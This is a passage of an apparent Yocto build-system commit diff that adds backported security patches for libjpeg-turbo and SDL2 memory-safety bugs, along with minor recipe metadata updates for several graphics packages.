++	if [ -d $OUTDIR ]; then
++		rm -rf $OUTDIR
++	fi
++}
++
++runme()
++{
++	echo \*\*\* $*
++	$*
++}
++
++IMAGE=vgl_6548_0026a.bmp
++WIDTH=128
++HEIGHT=95
++IMGDIR=@CMAKE_CURRENT_SOURCE_DIR@/testimages
++OUTDIR=`mktemp -d /tmp/__croptest_output.XXXXXX`
++EXEDIR=@CMAKE_CURRENT_BINARY_DIR@
++
++if [ -d $OUTDIR ]; then
++	rm -rf $OUTDIR
++fi
++mkdir -p $OUTDIR
++
++exec >$EXEDIR/croptest.log
++
++echo "============================================================"
++echo "$IMAGE ($WIDTH x $HEIGHT)"
++echo "============================================================"
++echo
++
++for PROGARG in "" -progressive; do
++
++	cp $IMGDIR/$IMAGE $OUTDIR
++	basename=`basename $IMAGE .bmp`
++	echo "------------------------------------------------------------"
++	echo "Generating test images"
++	echo "------------------------------------------------------------"
++	echo
++	runme $EXEDIR/cjpeg $PROGARG -grayscale -outfile $OUTDIR/${basename}_GRAY.jpg $IMGDIR/${basename}.bmp
++	runme $EXEDIR/cjpeg $PROGARG -sample 2x2 -outfile $OUTDIR/${basename}_420.jpg $IMGDIR/${basename}.bmp
++	runme $EXEDIR/cjpeg $PROGARG -sample 2x1 -outfile $OUTDIR/${basename}_422.jpg $IMGDIR/${basename}.bmp
++	runme $EXEDIR/cjpeg $PROGARG -sample 1x2 -outfile $OUTDIR/${basename}_440.jpg $IMGDIR/${basename}.bmp
++	runme $EXEDIR/cjpeg $PROGARG -sample 1x1 -outfile $OUTDIR/${basename}_444.jpg $IMGDIR/${basename}.bmp
++	echo
++
++	for NSARG in "" -nosmooth; do
++
++		for COLORSARG in "" "-colors 256 -dither none -onepass"; do
++
++			for Y in {0..16}; do
++
++				for H in {1..16}; do
++
++					X=$(( (Y*16)%128 ))
++					W=$(( WIDTH-X-7 ))
++					if [ $Y -le 15 ]; then
++						CROPSPEC="${W}x${H}+${X}+${Y}"
++					else
++						Y2=$(( HEIGHT-H ));
++						CROPSPEC="${W}x${H}+${X}+${Y2}"
++					fi
++
++					echo "------------------------------------------------------------"
++					echo $PROGARG $NSARG $COLORSARG -crop $CROPSPEC
++					echo "------------------------------------------------------------"
++					echo
++					for samp in GRAY 420 422 440 444; do
++						$EXEDIR/djpeg $NSARG $COLORSARG -rgb -outfile $OUTDIR/${basename}_${samp}_full.ppm $OUTDIR/${basename}_${samp}.jpg
++						convert -crop $CROPSPEC $OUTDIR/${basename}_${samp}_full.ppm $OUTDIR/${basename}_${samp}_ref.ppm
++						runme $EXEDIR/djpeg $NSARG $COLORSARG -crop $CROPSPEC -rgb -outfile $OUTDIR/${basename}_${samp}.ppm $OUTDIR/${basename}_${samp}.jpg
++						runme cmp $OUTDIR/${basename}_${samp}.ppm $OUTDIR/${basename}_${samp}_ref.ppm
++					done
++					echo
++
++				done
++
++			done
++
++		done
++
++	done
++
++done
++
++echo SUCCESS!
+diff --git a/jdapistd.c b/jdapistd.c
+index 91da642..c502909 100644
+--- a/jdapistd.c
++++ b/jdapistd.c
+@@ -306,16 +306,6 @@ noop_quantize(j_decompress_ptr cinfo, JSAMPARRAY input_buf,
+ }
+ 
+ 
+-/* Dummy postprocessing function used by jpeg_skip_scanlines() */
+-LOCAL(void)
+-noop_post_process (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+-                   JDIMENSION *in_row_group_ctr,
+-                   JDIMENSION in_row_groups_avail, JSAMPARRAY output_buf,
+-                   JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
+-{
+-}
+-
+-
+ /*
+  * In some cases, it is best to call jpeg_read_scanlines() and discard the
+  * output, rather than skipping the scanlines, because this allows us to
+@@ -329,16 +319,12 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ {
+   JDIMENSION n;
+   my_master_ptr master = (my_master_ptr)cinfo->master;
++  JSAMPARRAY scanlines = NULL;
+   void (*color_convert) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+                          JDIMENSION input_row, JSAMPARRAY output_buf,
+                          int num_rows) = NULL;
+   void (*color_quantize) (j_decompress_ptr cinfo, JSAMPARRAY input_buf,
+                           JSAMPARRAY output_buf, int num_rows) = NULL;
+-  void (*post_process_data) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+-                             JDIMENSION *in_row_group_ctr,
+-                             JDIMENSION in_row_groups_avail,
+-                             JSAMPARRAY output_buf, JDIMENSION *out_row_ctr,
+-                             JDIMENSION out_rows_avail) = NULL;
+ 
+   if (cinfo->cconvert && cinfo->cconvert->color_convert) {
+     color_convert = cinfo->cconvert->color_convert;
+@@ -350,23 +336,19 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+     cinfo->cquantize->color_quantize = noop_quantize;
+   }
+ 
+-  if (master->using_merged_upsample && cinfo->post &&
+-      cinfo->post->post_process_data) {
+-    post_process_data = cinfo->post->post_process_data;
+-    cinfo->post->post_process_data = noop_post_process;
++  if (master->using_merged_upsample && cinfo->max_v_samp_factor == 2) {
++    my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
++    scanlines = &upsample->spare_row;
+   }
+ 
+   for (n = 0; n < num_lines; n++)
+-    jpeg_read_scanlines(cinfo, NULL, 1);
++    jpeg_read_scanlines(cinfo, scanlines, 1);
+ 
+   if (color_convert)
+     cinfo->cconvert->color_convert = color_convert;
+ 
+   if (color_quantize)
+     cinfo->cquantize->color_quantize = color_quantize;
+-
+-  if (post_process_data)
+-    cinfo->post->post_process_data = post_process_data;
+ }
+ 
+ 
+@@ -380,6 +362,12 @@ increment_simple_rowgroup_ctr(j_decompress_ptr cinfo, JDIMENSION rows)
+ {
+   JDIMENSION rows_left;
+   my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
++  my_master_ptr master = (my_master_ptr)cinfo->master;
++
++  if (master->using_merged_upsample && cinfo->max_v_samp_factor == 2) {
++    read_and_discard_scanlines(cinfo, rows);
++    return;
++  }
+ 
+   /* Increment the counter to the next row group after the skipped rows. */
+   main_ptr->rowgroup_ctr += rows / cinfo->max_v_samp_factor;
+@@ -410,11 +398,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+   my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
+   my_coef_ptr coef = (my_coef_ptr)cinfo->coef;
+   my_master_ptr master = (my_master_ptr)cinfo->master;
++  my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
+   JDIMENSION i, x;
+   int y;
+   JDIMENSION lines_per_iMCU_row, lines_left_in_iMCU_row, lines_after_iMCU_row;
+   JDIMENSION lines_to_skip, lines_to_read;
+ 
++  /* Two-pass color quantization is not supported. */
++  if (cinfo->quantize_colors && cinfo->two_pass_quantize)
++    ERREXIT(cinfo, JERR_NOTIMPL);
++
+   if (cinfo->global_state != DSTATE_SCANNING)
+     ERREXIT1(cinfo, JERR_BAD_STATE, cinfo->global_state);
+ 
+@@ -472,13 +465,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+     main_ptr->buffer_full = FALSE;
+     main_ptr->rowgroup_ctr = 0;
+     main_ptr->context_state = CTX_PREPARE_FOR_IMCU;
+-    if (master->using_merged_upsample) {
+-      my_merged_upsample_ptr upsample =
+-        (my_merged_upsample_ptr)cinfo->upsample;
+-      upsample->spare_full = FALSE;
+-      upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+-    } else {
+-      my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++    if (!master->using_merged_upsample) {
+       upsample->next_row_out = cinfo->max_v_samp_factor;
+       upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+     }
+@@ -493,13 +480,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+       cinfo->output_scanline += lines_left_in_iMCU_row;
+       main_ptr->buffer_full = FALSE;
+       main_ptr->rowgroup_ctr = 0;
+-      if (master->using_merged_upsample) {
+-        my_merged_upsample_ptr upsample =
+-          (my_merged_upsample_ptr)cinfo->upsample;
+-        upsample->spare_full = FALSE;
+-        upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+-      } else {
+-        my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++      if (!master->using_merged_upsample) {
+         upsample->next_row_out = cinfo->max_v_samp_factor;
+         upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+       }
+@@ -537,14 +518,8 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+       cinfo->output_iMCU_row += lines_to_skip / lines_per_iMCU_row;
+       increment_simple_rowgroup_ctr(cinfo, lines_to_read);
+     }
+-    if (master->using_merged_upsample) {
+-      my_merged_upsample_ptr upsample =
+-        (my_merged_upsample_ptr)cinfo->upsample;
+-      upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+-    } else {
+-      my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++    if (!master->using_merged_upsample)
+       upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+-    }
+     return num_lines;
+   }
+ 
+@@ -585,13 +560,8 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+    * bit odd, since "rows_to_go" seems to be redundantly keeping track of
+    * output_scanline.
+    */
+-  if (master->using_merged_upsample) {
+-    my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
++  if (!master->using_merged_upsample)
+     upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+-  } else {
+-    my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
+-    upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
+-  }
+ 
+   /* Always skip the requested number of lines. */
+   return num_lines;
+diff --git a/libjpeg.txt b/libjpeg.txt
+index c50cf90..c233ecb 100644
+--- a/libjpeg.txt
++++ b/libjpeg.txt
+@@ -3,7 +3,7 @@ USING THE IJG JPEG LIBRARY
+ This file was part of the Independent JPEG Group's software:
+ Copyright (C) 1994-2013, Thomas G. Lane, Guido Vollbeding.
+ libjpeg-turbo Modifications:
+-Copyright (C) 2010, 2014-2018, D. R. Commander.
++Copyright (C) 2010, 2014-2018, 2020, D. R. Commander.
+ Copyright (C) 2015, Google, Inc.
+ For conditions of distribution and use, see the accompanying README.ijg file.
+ 
+@@ -750,7 +750,9 @@ multiple rows in the JPEG image.
+ 
+ Suspending data sources are not supported by this function.  Calling
+ jpeg_skip_scanlines() with a suspending data source will result in undefined
+-behavior.
++behavior.  Two-pass color quantization is also not supported by this function.
++Calling jpeg_skip_scanlines() with two-pass color quantization enabled will
++result in an error.
+ 
+ jpeg_skip_scanlines() will not allow skipping past the bottom of the image.  If
+ the value of num_lines is large enough to skip past the bottom of the image,
+-- 
+2.25.1
+
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch b/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch
new file mode 100644
index 0000000000..68cf89e628
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch
@@ -0,0 +1,133 @@
+From f35fd27ec641c42d6b115bfa595e483ec58188d2 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Tue, 6 Apr 2021 12:51:03 -0500
+Subject: [PATCH] tjLoadImage: Fix issues w/loading 16-bit PPMs/PGMs
+
+- The PPM reader now throws an error rather than segfaulting (due to a
+  buffer overrun) if an application attempts to load a 16-bit PPM file
+  into a grayscale uncompressed image buffer.  No known applications
+  allowed that (not even the test applications in libjpeg-turbo),
+  because that mode of operation was never expected to work and did not
+  work under any circumstances.  (In fact, it was necessary to modify
+  TJBench in order to reproduce the issue outside of a fuzzing
+  environment.)  This was purely a matter of making the library bow out
+  gracefully rather than crash if an application tries to do something
+  really stupid.
+
+- The PPM reader now throws an error rather than generating incorrect
+  pixels if an application attempts to load a 16-bit PGM file into an
+  RGB uncompressed image buffer.
+
+- The PPM reader now correctly loads 16-bit PPM files into extended
+  RGB uncompressed image buffers.  (Previously it generated incorrect
+  pixels unless the input colorspace was JCS_RGB or JCS_EXT_RGB.)
+
+The only way that users could have potentially encountered these issues
+was through the tjLoadImage() function.  cjpeg and TJBench were
+unaffected.
+
+CVE: CVE-2021-46822
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/f35fd27ec641c42d6b115bfa595e483ec58188d2.patch]
+Comment: Refreshed hunks from ChangeLog.md
+         Refreshed hunks from rdppm.c
+
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+
+---
+ ChangeLog.md | 10 ++++++++++
+ rdppm.c      | 26 ++++++++++++++++++++------
+ 2 files changed, 30 insertions(+), 6 deletions(-)
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index 968969c6b..12e730a0e 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -44,6 +44,15 @@
+ that maximum value was less than 255.  libjpeg-turbo 1.5.0 already included a
+ similar fix for binary PPM/PGM files with maximum values greater than 255.
+
++7. The PPM reader now throws an error, rather than segfaulting (due to a buffer
++overrun) or generating incorrect pixels, if an application attempts to use the
++`tjLoadImage()` function to load a 16-bit binary PPM file (a binary PPM file
++with a maximum value greater than 255) into a grayscale image buffer or to load
++a 16-bit binary PGM file into an RGB image buffer.
++
++8. Fixed an issue in the PPM reader that caused incorrect pixels to be
++generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
++file into an extended RGB image buffer.
+
+ 2.0.3
+ =====
+diff --git a/rdppm.c b/rdppm.c
+index c4c937e8a..6ac8fdbf7 100644
+--- a/rdppm.c
++++ b/rdppm.c
+@@ -5,7 +5,7 @@
+  * Copyright (C) 1991-1997, Thomas G. Lane.
+  * Modified 2009 by Bill Allombert, Guido Vollbeding.
+  * libjpeg-turbo Modifications:
+- * Copyright (C) 2015-2017, 2020, D. R. Commander.
++ * Copyright (C) 2015-2017, 2020-2021, D. R. Commander.
+  * For conditions of distribution and use, see the accompanying README.ijg
+  * file.
+  *
+@@ -516,6 +516,11 @@ get_word_rgb_row(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
+   register JSAMPLE *rescale = source->rescale;
+   JDIMENSION col;
+   unsigned int maxval = source->maxval;
++  register int rindex = rgb_red[cinfo->in_color_space];
++  register int gindex = rgb_green[cinfo->in_color_space];
++  register int bindex = rgb_blue[cinfo->in_color_space];
++  register int aindex = alpha_index[cinfo->in_color_space];
++  register int ps = rgb_pixelsize[cinfo->in_color_space];
+
+   if (!ReadOK(source->pub.input_file, source->iobuffer, source->buffer_width))
+     ERREXIT(cinfo, JERR_INPUT_EOF);
+@@ -527,17 +532,20 @@ get_word_rgb_row(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
+     temp |= UCH(*bufferptr++);
+     if (temp > maxval)
+       ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
+-    *ptr++ = rescale[temp];
++    ptr[rindex] = rescale[temp];
+     temp  = UCH(*bufferptr++) << 8;
+     temp |= UCH(*bufferptr++);
+     if (temp > maxval)
+       ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
+-    *ptr++ = rescale[temp];
++    ptr[gindex] = rescale[temp];
+     temp  = UCH(*bufferptr++) << 8;
+     temp |= UCH(*bufferptr++);
+     if (temp > maxval)
+       ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
+-    *ptr++ = rescale[temp];
++    ptr[bindex] = rescale[temp];
++    if (aindex >= 0)
++      ptr[aindex] = 0xFF;
++    ptr += ps;
+   }
+   return 1;
+ }
+@@ -624,7 +632,10 @@ start_input_ppm(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
+       cinfo->in_color_space = JCS_GRAYSCALE;
+     TRACEMS2(cinfo, 1, JTRC_PGM, w, h);
+     if (maxval > 255) {
+-      source->pub.get_pixel_rows = get_word_gray_row;
++      if (cinfo->in_color_space == JCS_GRAYSCALE)
++        source->pub.get_pixel_rows = get_word_gray_row;
++      else
++        ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
+     } else if (maxval == MAXJSAMPLE && sizeof(JSAMPLE) == sizeof(U_CHAR) &&
+                cinfo->in_color_space == JCS_GRAYSCALE) {
+       source->pub.get_pixel_rows = get_raw_row;
+@@ -657,7 +657,10 @@
+       cinfo->in_color_space = JCS_EXT_RGB;
+     TRACEMS2(cinfo, 1, JTRC_PPM, w, h);
+     if (maxval > 255) {
+-      source->pub.get_pixel_rows = get_word_rgb_row;
++      if (IsExtRGB(cinfo->in_color_space))
++              source->pub.get_pixel_rows = get_word_rgb_row;
++              else
++              ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
+     } else if (maxval == MAXJSAMPLE && sizeof(JSAMPLE) == sizeof(U_CHAR) &&
+                (cinfo->in_color_space == JCS_EXT_RGB
+ #if RGB_RED == 0 && RGB_GREEN == 1 && RGB_BLUE == 2 && RGB_PIXELSIZE == 3
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch
new file mode 100644
index 0000000000..6668f6e41d
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch
@@ -0,0 +1,97 @@
+From 9679473547874c472569d54fecce32b463999a9d Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Tue, 4 Apr 2023 19:06:20 -0500
+Subject: [PATCH] Decomp: Don't enable 2-pass color quant w/ RGB565
+
+The 2-pass color quantization algorithm assumes 3-sample pixels.  RGB565
+is the only 3-component colorspace that doesn't have 3-sample pixels, so
+we need to treat it as a special case when determining whether to enable
+2-pass color quantization.  Otherwise, attempting to initialize 2-pass
+color quantization with an RGB565 output buffer could cause
+prescan_quantize() to read from uninitialized memory and subsequently
+underflow/overflow the histogram array.
+
+djpeg is supposed to fail gracefully if both -rgb565 and -colors are
+specified, because none of its destination managers (image writers)
+support color quantization with RGB565.  However, prescan_quantize() was
+called before that could occur.  It is possible but very unlikely that
+these issues could have been reproduced in applications other than
+djpeg.  The issues involve the use of two features (12-bit precision and
+RGB565) that are incompatible, and they also involve the use of two
+rarely-used legacy features (RGB565 and color quantization) that don't
+make much sense when combined.
+
+Fixes #668
+Fixes #671
+Fixes #680
+
+CVE: CVE-2023-2804
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/9679473547874c472569d54fecce32b463999a9d]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ ChangeLog.md | 6 ++++++
+ jdmaster.c   | 5 +++--
+ jquant2.c    | 5 +++--
+ 3 files changed, 12 insertions(+), 4 deletions(-)
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index e605abe73..de0c4d0dd 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -1,3 +1,9 @@ quality values.
++9. Fixed an oversight in 1.4 beta1[8] that caused various segfaults and buffer
++overruns when attempting to decompress various specially-crafted malformed
++12-bit-per-component JPEG images using a 12-bit-per-component build of djpeg
++(`-DWITH_12BIT=1`) with both color quantization and RGB565 color conversion
++enabled.
++
+ 2.0.4
+ =====
+ 
+diff --git a/jdmaster.c b/jdmaster.c
+index b20906438..8d8ef9956 100644
+--- a/jdmaster.c
++++ b/jdmaster.c
+@@ -5,7 +5,7 @@
+  * Copyright (C) 1991-1997, Thomas G. Lane.
+  * Modified 2002-2009 by Guido Vollbeding.
+  * libjpeg-turbo Modifications:
+- * Copyright (C) 2009-2011, 2016, D. R. Commander.
++ * Copyright (C) 2009-2011, 2016, 2023, D. R. Commander.
+  * Copyright (C) 2013, Linaro Limited.
+  * Copyright (C) 2015, Google, Inc.
+  * For conditions of distribution and use, see the accompanying README.ijg
+@@ -492,7 +492,8 @@ master_selection(j_decompress_ptr cinfo)
+     if (cinfo->raw_data_out)
+       ERREXIT(cinfo, JERR_NOTIMPL);
+     /* 2-pass quantizer only works in 3-component color space. */
+-    if (cinfo->out_color_components != 3) {
++    if (cinfo->out_color_components != 3 ||
++        cinfo->out_color_space == JCS_RGB565) {
+       cinfo->enable_1pass_quant = TRUE;
+       cinfo->enable_external_quant = FALSE;
+       cinfo->enable_2pass_quant = FALSE;
+diff --git a/jquant2.c b/jquant2.c
+index 6570613bb..c760380fb 100644
+--- a/jquant2.c
++++ b/jquant2.c
+@@ -4,7 +4,7 @@
+  * This file was part of the Independent JPEG Group's software:
+  * Copyright (C) 1991-1996, Thomas G. Lane.
+  * libjpeg-turbo Modifications:
+- * Copyright (C) 2009, 2014-2015, D. R. Commander.
++ * Copyright (C) 2009, 2014-2015, 2020, 2023, D. R. Commander.
+  * For conditions of distribution and use, see the accompanying README.ijg
+  * file.
+  *
+@@ -1230,7 +1230,8 @@ jinit_2pass_quantizer(j_decompress_ptr cinfo)
+   cquantize->error_limiter = NULL;
+ 
+   /* Make sure jdmaster didn't give me a case I can't handle */
+-  if (cinfo->out_color_components != 3)
++  if (cinfo->out_color_components != 3 ||
++      cinfo->out_color_space == JCS_RGB565)
+     ERREXIT(cinfo, JERR_NOTIMPL);
+ 
+   /* Allocate the histogram/inverse colormap storage */
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch
new file mode 100644
index 0000000000..bcba0b513d
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch
@@ -0,0 +1,75 @@
+From 0deab87e24ab3106d5332205f829d1846fa65001 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Thu, 6 Apr 2023 18:33:41 -0500
+Subject: [PATCH] jpeg_crop_scanline: Fix calc w/sclg + 2x4,4x2 samp
+
+When computing the downsampled width for a particular component,
+jpeg_crop_scanline() needs to take into account the fact that the
+libjpeg code uses a combination of IDCT scaling and upsampling to
+implement 4x2 and 2x4 upsampling with certain decompression scaling
+factors.  Failing to account for that led to incomplete upsampling of
+4x2- or 2x4-subsampled components, which caused the color converter to
+read from uninitialized memory.  With 12-bit data precision, this caused
+a buffer overrun or underrun and subsequent segfault if the
+uninitialized memory contained a value that was outside of the valid
+sample range (because the color converter uses the value as an array
+index.)
+
+Fixes #669
+
+CVE: CVE-2023-2804
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/0deab87e24ab3106d5332205f829d1846fa65001]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ ChangeLog.md |  8 ++++++++
+ jdapistd.c   | 10 ++++++----
+ 2 files changed, 14 insertions(+), 4 deletions(-)
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index de0c4d0dd..159bd1610 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -4,6 +4,14 @@ overruns when attempting to decompress various specially-crafted malformed
+ (`-DWITH_12BIT=1`) with both color quantization and RGB565 color conversion
+ enabled.
+ 
++10. Fixed an issue whereby `jpeg_crop_scanline()` sometimes miscalculated the
++downsampled width for components with 4x2 or 2x4 subsampling factors if
++decompression scaling was enabled.  This caused the components to be upsampled
++incompletely, which caused the color converter to read from uninitialized
++memory.  With 12-bit data precision, this caused a buffer overrun or underrun
++and subsequent segfault if the sample value read from unitialized memory was
++outside of the valid sample range.
++
+ 2.0.4
+ =====
+ 
+diff --git a/jdapistd.c b/jdapistd.c
+index 628626254..eb577928c 100644
+--- a/jdapistd.c
++++ b/jdapistd.c
+@@ -4,7 +4,7 @@
+  * This file was part of the Independent JPEG Group's software:
+  * Copyright (C) 1994-1996, Thomas G. Lane.
+  * libjpeg-turbo Modifications:
+- * Copyright (C) 2010, 2015-2018, 2020, D. R. Commander.
++ * Copyright (C) 2010, 2015-2018, 2020, 2023, D. R. Commander.
+  * Copyright (C) 2015, Google, Inc.
+  * For conditions of distribution and use, see the accompanying README.ijg
+  * file.
+@@ -225,9 +225,11 @@ jpeg_crop_scanline(j_decompress_ptr cinfo, JDIMENSION *xoffset,
+     /* Set downsampled_width to the new output width. */
+     orig_downsampled_width = compptr->downsampled_width;
+     compptr->downsampled_width =
+-      (JDIMENSION)jdiv_round_up((long)(cinfo->output_width *
+-                                       compptr->h_samp_factor),
+-                                (long)cinfo->max_h_samp_factor);
++      (JDIMENSION)jdiv_round_up((long)cinfo->output_width *
++                                (long)(compptr->h_samp_factor *
++                                       compptr->_DCT_scaled_size),
++                                (long)(cinfo->max_h_samp_factor *
++                                       cinfo->_min_DCT_scaled_size));
+     if (compptr->downsampled_width < 2 && orig_downsampled_width >= 2)
+       reinit_upsampler = TRUE;
+ 
diff --git a/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb b/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
index 3005a8a789..fda425c219 100644
--- a/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
+++ b/meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb
@@ -13,6 +13,11 @@ DEPENDS_append_x86_class-target    = " nasm-native"
 SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BPN}-${PV}.tar.gz \
            file://0001-libjpeg-turbo-fix-package_qa-error.patch \
            file://CVE-2020-13790.patch \
+           file://CVE-2021-46822.patch \
+           file://CVE-2020-35538-1.patch \
+           file://CVE-2020-35538-2.patch \
+           file://CVE-2023-2804-1.patch \
+           file://CVE-2023-2804-2.patch \
            "
 
 SRC_URI[md5sum] = "d01d9e0c28c27bc0de9f4e2e8ff49855"
diff --git a/meta/recipes-graphics/kmscube/kmscube_git.bb b/meta/recipes-graphics/kmscube/kmscube_git.bb
index a1a295f660..0aae6df357 100644
--- a/meta/recipes-graphics/kmscube/kmscube_git.bb
+++ b/meta/recipes-graphics/kmscube/kmscube_git.bb
@@ -1,4 +1,8 @@
-DESCRIPTION = "Demo application to showcase 3D graphics using kms and gbm"
+SUMMARY = "Demo application to showcase 3D graphics using kms and gbm"
+DESCRIPTION = "kmscube is a little demonstration program for how to drive bare metal graphics \
+without a compositor like X11, wayland or similar, using DRM/KMS (kernel mode \
+setting), GBM (graphics buffer manager) and EGL for rendering content using \
+OpenGL or OpenGL ES."
 HOMEPAGE = "https://cgit.freedesktop.org/mesa/kmscube/"
 LICENSE = "MIT"
 SECTION = "graphics"
diff --git a/meta/recipes-graphics/libfakekey/libfakekey_git.bb b/meta/recipes-graphics/libfakekey/libfakekey_git.bb
index ab6f5ac9ed..33ea6fe5a9 100644
--- a/meta/recipes-graphics/libfakekey/libfakekey_git.bb
+++ b/meta/recipes-graphics/libfakekey/libfakekey_git.bb
@@ -13,7 +13,7 @@ SECTION = "x11/wm"
 SRCREV = "7ad885912efb2131e80914e964d5e635b0d07b40"
 PV = "0.3+git${SRCPV}"
 
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
 
 S = "${WORKDIR}/git"
 
diff --git a/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb b/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
index 1a31677978..06bd682823 100644
--- a/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
+++ b/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb
@@ -17,7 +17,7 @@ DEPENDS = "virtual/libx11 libxext"
 
 #SRCREV for 1.12
 SRCREV = "e846ee434f8e23d9db38af13c523f791495e0e87"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
 
 S = "${WORKDIR}/git"
 
diff --git a/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch
new file mode 100644
index 0000000000..d8fa24bc65
--- /dev/null
+++ b/meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch
@@ -0,0 +1,79 @@
+From a7ff6e96155f550a5597621ebeddd03c98aa9294 Mon Sep 17 00:00:00 2001
+From: Sam Lantinga <slouken@libsdl.org>
+Date: Wed, 17 Jun 2020 08:44:45 -0700
+Subject: [PATCH] Fixed overflow in surface pitch calculation
+
+
+Upstream-Status: Backport
+[https://github.com/libsdl-org/SDL/commit/a7ff6e96155f550a5597621ebeddd03c98aa9294]
+CVE: CVE-2020-14409 CVE-2020-14410
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ src/video/SDL_surface.c | 23 +++++++++++++++--------
+ 1 file changed, 15 insertions(+), 8 deletions(-)
+
+diff --git a/src/video/SDL_surface.c b/src/video/SDL_surface.c
+index 085d9ff1e..bff826f7c 100644
+--- a/src/video/SDL_surface.c
++++ b/src/video/SDL_surface.c
+@@ -28,24 +28,23 @@
+ #include "SDL_yuv_c.h"
+ 
+ 
+-/* Check to make sure we can safely check multiplication of surface w and pitch and it won't overflow size_t */
+-SDL_COMPILE_TIME_ASSERT(surface_size_assumptions,
+-    sizeof(int) == sizeof(Sint32) && sizeof(size_t) >= sizeof(Sint32));
++/* Check to make sure we can safely check multiplication of surface w and pitch and it won't overflow Sint64 */
++SDL_COMPILE_TIME_ASSERT(surface_size_assumptions, sizeof(int) == sizeof(Sint32));
+ 
+ /* Public routines */
+ 
+ /*
+  * Calculate the pad-aligned scanline width of a surface
+  */
+-static int
++static Sint64
+ SDL_CalculatePitch(Uint32 format, int width)
+ {
+-    int pitch;
++    Sint64 pitch;
+ 
+     if (SDL_ISPIXELFORMAT_FOURCC(format) || SDL_BITSPERPIXEL(format) >= 8) {
+-        pitch = (width * SDL_BYTESPERPIXEL(format));
